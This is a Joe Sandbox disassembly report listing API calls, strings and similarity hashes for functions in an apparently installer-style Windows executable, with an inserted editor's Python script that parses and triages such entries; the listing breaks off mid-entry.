  • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
• TranslateMessage.USER32(?), ref: 004573B3
• DispatchMessageA.USER32(?), ref: 004573BC
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                                                            • String ID: [Paused]
                                                                                                                            • API String ID: 1007367021-4230553315
                                                                                                                            • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                            • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                                                            • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                            • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
• LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
• SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
• Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
• SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Cursor$LoadSleep
• String ID: CheckPassword
• API String ID: 4023313301-1302249611
• Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
• Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
• Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
• Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
  • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
  • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
• SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
• GetTickCount.KERNEL32 ref: 00477CE6
• GetTickCount.KERNEL32 ref: 00477CF0
• MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
Strings
• CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
• CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
• String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
• API String ID: 613034392-3771334282
• Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
• Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
• Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
• Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
Strings
• Failed to load .NET Framework DLL "%s", xrefs: 00459824
• .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
• Fusion.dll, xrefs: 004597DF
• Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
• CreateAssemblyCache, xrefs: 00459836
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressProc
• String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
• API String ID: 190572456-3990135632
• Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
• Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
• Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
• Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
Uniqueness

Uniqueness Score: -1.00%

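Editor's note (added example, not part of the Joe Sandbox report or of the analysed sample): the entries above are easier to work with as records than as a scrolling listing. The Python below parses the entry format used throughout this section (an APIs list with "Part of subcall function" sub-items, a Strings list with xrefs, the Similarity identifiers and the closing Uniqueness Score) and tags entries whose API mix a reverser would open first. The embedded SAMPLE is the Fusion.dll/CreateAssemblyCache entry and the CallSpawnServer entry copied from above; the WATCH table is this editor's assumption, not a Joe Sandbox heuristic. Those two sets of strings, together with "[Paused]" and "CheckPassword" in the earlier entries, match the Inno Setup installer runtime's own source strings (its SpawnClient and .NET helper units); that is this editor's identification and not a verdict the report states.

```python
import re
from collections import Counter

# Constructed sample input: the Fusion.dll and CallSpawnServer entries copied
# from the listing above, re-indented, with the hash lines dropped.
SAMPLE = """\
APIs
• GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
Strings
• Failed to load .NET Framework DLL "%s", xrefs: 00459824
• .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
• Fusion.dll, xrefs: 004597DF
• Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
• CreateAssemblyCache, xrefs: 00459836
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc
• String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
• API String ID: 190572456-3990135632
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
  • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
  • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
• SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
• GetTickCount.KERNEL32 ref: 00477CE6
• GetTickCount.KERNEL32 ref: 00477CF0
• MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
Strings
• CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
• CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
Similarity
• API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
• String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
• API String ID: 613034392-3771334282
Uniqueness

Uniqueness Score: -1.00%
"""

# "Part of subcall function X: Name.MODULE(args), ref: ADDR"; the parentheses
# and the comma before "ref:" are absent for zero-argument calls (GetTickCount).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}

# Editorial assumption: API combinations worth opening in the disassembler
# first, as (required names, co-occurring names or None) sets.
WATCH = {
    "dynamic-import-resolution": ({"GetProcAddress"},
                                  {"GetModuleHandleA", "GetModuleHandleW",
                                   "LoadLibraryA", "LoadLibraryW"}),
    "registry-read": ({"RegOpenKeyExA", "RegOpenKeyExW"},
                      {"RegQueryValueExA", "RegQueryValueExW", "RegCloseKey"}),
    "timing-or-delay": ({"Sleep", "GetTickCount"}, None),
}


def parse_entries(text):
    """One dict per function entry; a 'Uniqueness Score' line closes an entry."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Uniqueness Score:"):
            if cur is not None:
                cur["uniqueness_score"] = line.split(":", 1)[1].strip()
                entries.append(cur)
            cur, section = None, None
            continue
        if line in SECTIONS:
            if cur is None:
                cur = {"apis": [], "strings": [], "similarity": {}, "source": None}
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        item = line[1:].strip()
        if section == "APIs" and (m := API_RE.match(item)):
            cur["apis"].append({"name": m["name"], "module": m["mod"],
                                "args": [a for a in (m["args"] or "").split(",") if a],
                                "ref": m["ref"], "subcall_of": m["sub"]})
        elif section == "Strings" and (m := STR_RE.match(item)):
            cur["strings"].append({"text": m["text"], "ref": m["ref"]})
        elif section == "Similarity":
            key, _, value = item.partition(":")
            cur["similarity"][key.strip()] = value.strip()
        elif section == "Memory Dump Source" and item.startswith("Source File:"):
            cur["source"] = item
    if cur is not None and cur["apis"]:  # listing cut off before its score line
        entries.append(cur)
    return entries


def triage(entry):
    """WATCH tags whose API mix occurs in the entry (direct calls and subcalls)."""
    names = {a["name"] for a in entry["apis"]}
    return [tag for tag, (need, also) in WATCH.items()
            if names & need and (also is None or names & also)]


def api_histogram(entries):
    """Direct-call frequency of each API name across the parsed entries."""
    return Counter(a["name"] for e in entries for a in e["apis"]
                   if a["subcall_of"] is None)


def find_by_string(entries, needle):
    """Entries whose embedded strings contain needle (case-insensitive)."""
    needle = needle.lower()
    return [e for e in entries
            if any(needle in s["text"].lower() for s in e["strings"])]


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        first = min(a["ref"] for a in e["apis"] if a["subcall_of"] is None)
        print(first, [a["name"] for a in e["apis"]], triage(e), e["strings"][:1])
```

Run the file directly to print, per entry, the lowest direct call address, the API names, the triage tags and the first string. To cover the whole section, paste the listing into parse_entries with the leading indentation and the "Download File" link text stripped; the parser ignores the hash and Associated lines, and the ProductOptions entry further down (RegOpenKeyExA in a subcall plus RegCloseKey) picks up the registry-read tag.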
APIs
  • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
• GetFocus.USER32 ref: 0041C168
• GetDC.USER32(?), ref: 0041C174
• SelectPalette.GDI32(?,?,00000000), ref: 0041C195
• RealizePalette.GDI32(?), ref: 0041C1A1
• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
• SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
• ReleaseDC.USER32(?,?), ref: 0041C1ED
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Palette$Select$BitsFocusObjectRealizeRelease
• String ID:
• API String ID: 3303097818-0
• Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
• Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
• Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
• Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000000E), ref: 00418C70
• GetSystemMetrics.USER32(0000000D), ref: 00418C78
• 6F542980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
  • Part of subcall function 004107F8: 6F53C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
• 6F5ACB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
• 6F5AC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
• 6F5ACB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
• 6F540860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: MetricsSystem$C400C740F540860F542980
• String ID:
• API String ID: 3392676452-0
• Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
• Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
• Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
• Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CloseOpen
• String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
• API String ID: 47109696-2530820420
• Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
• Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
• Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
• Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
Uniqueness

Uniqueness Score: -1.00%

APIs
• SelectObject.GDI32(00000000,?), ref: 0041B470
• SelectObject.GDI32(?,00000000), ref: 0041B47F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
• SelectObject.GDI32(?,00000000), ref: 0041B4C7
• DeleteDC.GDI32(00000000), ref: 0041B4D0
• DeleteDC.GDI32(?), ref: 0041B4D9
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ObjectSelect$Delete$Stretch
• String ID:
• API String ID: 1458357782-0
• Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
• Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
• Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
• Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 00495519
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 0049553B
• GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
• GetTextMetricsA.GDI32(00000000,?), ref: 00495571
• ReleaseDC.USER32(00000000,00000000), ref: 0049558E
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 2948443157-222967699
• Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
• Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
• Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
• Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32 ref: 004233AF
• WindowFromPoint.USER32(?,?), ref: 004233BC
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
• GetCurrentThreadId.KERNEL32 ref: 004233D1
• SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
• SetCursor.USER32(00000000), ref: 00423413
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
• String ID:
• API String ID: 1770779139-0
• Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
• Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
• Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
• Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
• API String ID: 667068680-2254406584
• Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
• Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
• Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
• Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressProc
• String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
• API String ID: 190572456-212574377
• Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
• Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
• Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
• Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
• InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
  • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
  • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
  • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
